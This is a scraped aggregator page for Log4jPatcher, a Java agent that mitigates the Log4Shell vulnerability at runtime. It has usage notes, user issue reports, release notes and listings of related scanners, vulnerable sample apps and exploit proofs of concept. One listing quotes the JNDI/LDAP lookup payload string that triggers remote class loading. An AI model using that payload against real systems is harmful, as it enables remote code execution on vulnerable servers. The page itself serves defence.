A mitigation for CVE-2021-44228 (log4shell) that works by patching the vulnerability at runtime. (Works with any vulnerable java software, tested with java 6 and newer)

Last update: Dec 16, 2022

Overview

Log4jPatcher

A Java Agent based mitigation for Log4j2 JNDI exploits.

This agent employs 2 patches:

Disabling all Lookup conversions (on supported Log4j versions) in org.apache.logging.log4j.core.pattern.MessagePatternConverter by setting noLookups to true in the constructor.
Disabling the org.apache.logging.log4j.core.lookup.JndiLookup class by just returning null in its lookup function.

To use

Download the latest release available from GitHub: https://github.com/CreeperHost/Log4jPatcher/releases

Add -javaagent:Log4jPatcher.jar as a JVM argument.

For Minecraft users: The full path to the jar needs to be added in the above argument unless the jar is put into the instance (or .minecraft) folder. This jar does not go into the mods folder.

You can find a guide for Minecraft here:

https://www.creeperhost.net/wiki/books/minecraft-java-edition/page/mitigating-cve-2021-44228-in-minecraft

Contains all my research and content produced regarding the log4shell vulnerability

Objective Contains all my research and content produced regarding the log4shell vulnerability. Content Folder "analysis" Contain the information that

Oct 28, 2022

CVE-2021-44228 (Apache Log4j Remote Code Execution）

CVE-2021-44228 (Apache Log4j Remote Code Execution） all log4j-core versions =2.0-beta9 and =2.14.1 The version of 1.x has other vulnerabilities, it

Apr 23, 2022

Writeup and exploit for installed app to system privilege escalation on Android 12 Beta through CVE-2021-0928

Writeup and exploit for installed app to system privilege escalation on Android 12 Beta through CVE-2021-0928, a `writeToParcel`/`createFromParcel` serialization mismatch in `OutputConfiguration`

Dec 30, 2022

Huntress Log4Shell Testing Application

Huntress Log4Shell Testing Application This repo holds the source for the HTTP and LDAP servers hosted here. Both services are hosted under one Java a

Nov 25, 2022

Log4Shell RCE exploit using a gadget class. Not dependent on an old JDK version to work.

Jan 4, 2022

Log4Shell Zero-Day Exploit Proof of Concept

Log4Shell Zero-Day Exploit if attacker manage to log this string ${jndi:ldap://someaddresshere/param1=value1} to log4j it somehow loads the class/java

Oct 9, 2022

A Java Mindustry mod template that works on Android and PC. The Kotlin version of this mod can be seen here.

Mindustry Java Mod Template A Java Mindustry mod template that works on Android and PC. The Kotlin version of this mod can be seen here. Building for

Jan 22, 2022

JVM runtime class loading protection agent.（JVM类加载保护agent）

JVM类加载监控agent，可配置黑名单，禁止恶意类加载（包括jsp webshell）

Sep 28, 2022

Unofficial Clubhouse web app client. For personal use only. It's a personal open-source project and not affiliated with any company.

Purpose of this web app That's a personal project and not affiliated with any company. This is the web client app to make your Club House experience b

Nov 15, 2022

Comments

Question

i was trying to check if the patch was working before playing on any servers and was using the ${date:YYYY} in chat to check and when going to the logs any message including this was not in the logs im assuming this is how its supposed to work but just wanted to ask before doing anything dumb

also i have no idea how leave questions on github and may be doing something very annoying by posting this as an issue and am sorry for that

opened by anime0dude 0
Game fails to launch

Not sure if this is the correct place to share this, but: as of the latest vanilla MC launcher update, I am unable to launch a profile that includes the JVM argument -javaagent:Log4jPatcher.jar, as you're supposed to do when using this fix (https://www.creeperhost.net/wiki/books/minecraft-java-edition/page/mitigating-cve-2021-44228-in-minecraft)

Said profile is a modded instance of 1.8.9 being launched from the vanilla Minecraft launcher.

opened by MacchuPicchu3 2

Releases(v1.0.1)

v1.0.1(Dec 11, 2021)
Functionally unmodified, resolves some issues with older MinecraftForge versions throwing warnings due to class versions when the jar is added to the mods folder/discovered by Forge in the root directory.

Removed repacked module-info classes from the built jar.

Source code(tar.gz)
Source code(zip)
Log4jPatcher-1.0.1.jar(179.43 KB)
v1.0.0(Dec 10, 2021)

See Readme for usage instructions.
Source code(tar.gz)
Source code(zip)
Log4jPatcher-1.0.0.jar(179.68 KB)

Owner

GitHub

log4j2-scan is a single binary command-line tool for CVE-2021-44228 vulnerability scanning and mitigation patch

log4j2-scan is a single binary command-line tool for CVE-2021-44228 vulnerability scanning and mitigation patch. It also supports nested JAR file scan

839 Dec 29, 2022

Log4Shell sample vulnerable application (CVE-2021-44228)

5 Dec 26, 2021

Burp Active Scan extension to identify Log4j vulnerabilities CVE-2021-44228 and CVE-2021-45046

Log4j-HammerTime This Burp Suite Active Scanner extension validates exploitation of the Apache Log4j CVE-2021-44228 and CVE-2021-45046 vulnerabilities

8 Jan 8, 2022

Local Bytecode Scanner for the Log4JShell Vulnerability (CVE-2021-44228)

?? Log4JShell Bytecode Detector Log4jShell Bytecode Detector is an open source tool that helps identify if a jar file is affected by the critical CVE-

49 Apr 23, 2022

Log4shell-hunter - Scanner that scans local files for log4shell vulnerability

Log4shell-hunter - Scanner that scans local files for log4shell vulnerability. Does bytecode analysis so it does not rely on metadata. Will find vulnerable log4j even it has been self-compiled/repackaged/shaded/nested (e.g. uberjar, fatjar) and even obfuscated.

5 Feb 27, 2022

A mitigation for CVE-2021-44228 (log4shell) that works by patching the vulnerability at runtime. (Works with any vulnerable java software, tested with java 6 and newer)

Related tags

Overview

Log4jPatcher

To use

You might also like...

Contains all my research and content produced regarding the log4shell vulnerability

CVE-2021-44228 (Apache Log4j Remote Code Execution）

Writeup and exploit for installed app to system privilege escalation on Android 12 Beta through CVE-2021-0928

Huntress Log4Shell Testing Application

Log4Shell RCE exploit using a gadget class. Not dependent on an old JDK version to work.

Log4Shell Zero-Day Exploit Proof of Concept

A Java Mindustry mod template that works on Android and PC. The Kotlin version of this mod can be seen here.

JVM runtime class loading protection agent.（JVM类加载保护agent）

Unofficial Clubhouse web app client. For personal use only. It's a personal open-source project and not affiliated with any company.

Comments

Question

Game fails to launch

Releases(v1.0.1)

v1.0.1(Dec 11, 2021)

v1.0.0(Dec 10, 2021)

Owner

log4j2-scan is a single binary command-line tool for CVE-2021-44228 vulnerability scanning and mitigation patch

Log4Shell sample vulnerable application (CVE-2021-44228)

Burp Active Scan extension to identify Log4j vulnerabilities CVE-2021-44228 and CVE-2021-45046

Local Bytecode Scanner for the Log4JShell Vulnerability (CVE-2021-44228)

Log4shell-hunter - Scanner that scans local files for log4shell vulnerability

CVE-2021-44228 (Log4Shell) Proof of Concept

An LDAP RCE exploit for CVE-2021-44228 Log4Shell

PCRE RegEx matching Log4Shell CVE-2021-44228 IOC in your logs

Disables JNDI lookup globally using Java agent instrumentation, mitigation for Log4Shell attacks.

A Basic Java Application Vulnerable to the Log4Shell RCE